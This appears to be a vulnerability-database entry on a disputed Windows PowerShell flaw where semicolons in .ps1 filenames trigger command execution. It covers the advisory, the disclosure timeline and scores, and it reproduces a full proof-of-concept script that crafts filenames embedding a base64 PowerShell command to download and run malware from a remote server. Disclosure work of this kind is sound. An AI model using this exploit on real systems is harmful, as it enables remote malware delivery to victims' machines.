Published on August 30th, 2019 📆 | 3763 Views ⚑0
Microsoft Windows PowerShell privilege escalation [Disputed]
|CVSS Meta Temp Score||Current Exploit Price (≈)|
A vulnerability classified as critical was found in Microsoft Windows (Operating System) (the affected version is unknown). This vulnerability affects some unknown functionality of the component PowerShell. The manipulation with an unknown input leads to a privilege escalation vulnerability. The CWE definition for the vulnerability is CWE-269. As an impact it is known to affect confidentiality, integrity, and availability.
The weakness was shared 08/01/2019 by John Page (hyp3rlinx) as unconfirmed security advisory (Website). The advisory is available at hyp3rlinx.altervista.org. The vendor cooperated in the coordination of the public release. Local access is required to approach this attack. A single authentication is needed for exploitation. Technical details are unknown but a public exploit is available. The advisory points out:
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. This occurs when “.ps1” files contain semicolons “;” or spaces as part of the filename, causing the execution of a different trojan file; or the running of unexpected commands straight from the filename itself without the need for a second file.
A public exploit has been developed by John Page (hyp3rlinx) in POC and been published immediately after the advisory. It is declared as proof-of-concept. It is possible to download the exploit at hyp3rlinx.altervista.org. The vulnerability was handled as a non-public zero-day exploit for at least 12 days. During that time the estimated underground price was around $5k-$25k. The real existence of this vulnerability is still doubted at the moment. The code used by the exploit is:
from base64 import b64encode import argparse,sys #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. #Expects hostname/ip-addr of web-server housing the exploit. #By hyp3rlinx #Apparition Security #==================== def parse_args(): parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") return parser.parse_args() def main(args): PSEmbedFilenameMalwr="" if args.ipaddress: PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')) def create_file(payload): f=open("Test;PowerShell -e "+payload+";2.ps1", "w") f.write("Write-Output 'Have a nice day!'") f.close() if __name__=="__main__": parser = argparse.ArgumentParser() PSCmds = main(parse_args()) if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) create_file(PSCmds) print "PowerShell - Unsantized Filename Command Execution File created!" print "By hyp3rlinx"
The advisory illustrates:
or trojan files it doesn’t need to be another PowerShell script and can be one of the following “.com, .exe, .bat, .cpl, .js, .vbs and .wsf. Therefore, the vulnerably named file “.Hello;World.ps1” will instead execute “hello.exe”, if that script is invoked using the standard Windows shell “cmd.exe” and “hello.exe” resides in the same directory as the vulnerably named script.
The best possible mitigation is suggested to be disabling the affected component.
VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.9
AV AC Au C I A 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 🔍 Vector Complexity Authentication Confidentiality Integrity Availability unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock unlock
VulDB Base Score: 🔒
VulDB Temp Score: 🔒
VulDB Reliability: 🔍
Class: Privilege escalation (CWE-269)
Price Prediction: 🔍
Current Price Estimation: 🔒
0-Day unlock unlock unlock unlock Today unlock unlock unlock unlock
07/20/2019 Vendor informed
07/23/2019 +3 days Vendor acknowledged
08/01/2019 +9 days Advisory disclosed
08/01/2019 +0 days Exploit disclosed
08/30/2019 +29 days VulDB entry created
08/30/2019 +0 days VulDB last updateVendor: microsoft.com